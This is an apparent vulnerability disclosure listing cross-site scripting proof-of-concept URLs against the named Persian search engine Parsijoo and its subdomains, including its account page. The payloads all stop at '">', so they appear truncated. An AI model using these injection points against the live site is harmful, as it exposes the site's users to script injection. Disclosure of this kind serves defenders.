================================================================================
Cross Site Scripting on Search Engine Parsijoo
================================================================================
# # Author: bl4ck_mohajem (mohajem.war@gmail.com)
# #home page : http://www.parsijoo.ir/
# Description:
Parsijoo as a Persian search engine attempts to search for Persian
resources within the network.
# PoC 1 :
# URL: http://parsijoo.ir/web
# Vulnerable Parameter : q
# Payload : ">
# ==> http://parsijoo.ir/web?q=">
# PoC 2 :
# URL: http://image.parsijoo.ir/image
# Vulnerable Parameter : q
# Payload : ">
# ==> http://image.parsijoo.ir/image?q=">
# PoC 3 :
# URL: http://video.parsijoo.ir/video
# Vulnerable Parameter : q
# Payload : ">
# ==> http://video.parsijoo.ir/video?q=">
# PoC 4 :
# URL: http://ava.parsijoo.ir/ava
# Vulnerable Parameter : q
# Payload : ">
# ==> http://ava.parsijoo.ir/ava?q=">
# PoC 5 :
# URL: http://parsijoo.ir/download
# Vulnerable Parameter : q
# Payload : ">
# ==> http://parsijoo.ir/download?q=">
# PoC 6 :
# URL: http://parsijoo.ir/bazaar
# Vulnerable Parameter : q
# Payload : ">
# ==> http://parsijoo.ir/bazaar?q=>
# PoC 7 :
# URL: http://parsijoo.ir/feedback
# Vulnerable Parameter : src
# Payload : ">
# ==> http://parsijoo.ir/feedback?src=">
# PoC 8 :
A registered user can exploit this issue in combination with social engineering.
# URL : https://accounts.parsijoo.ir/account
# Vulnerable Parameter (POST) : form:name , form:lastname
# Payload : ">
Now can see alert in first page.
########################################################
#tnx: Milad Hacking - arf1372 - shabgard - ehsan hosseini - The
Nonexistent - n1arash- B3HZ4D - AMo hassan
#
#######################################################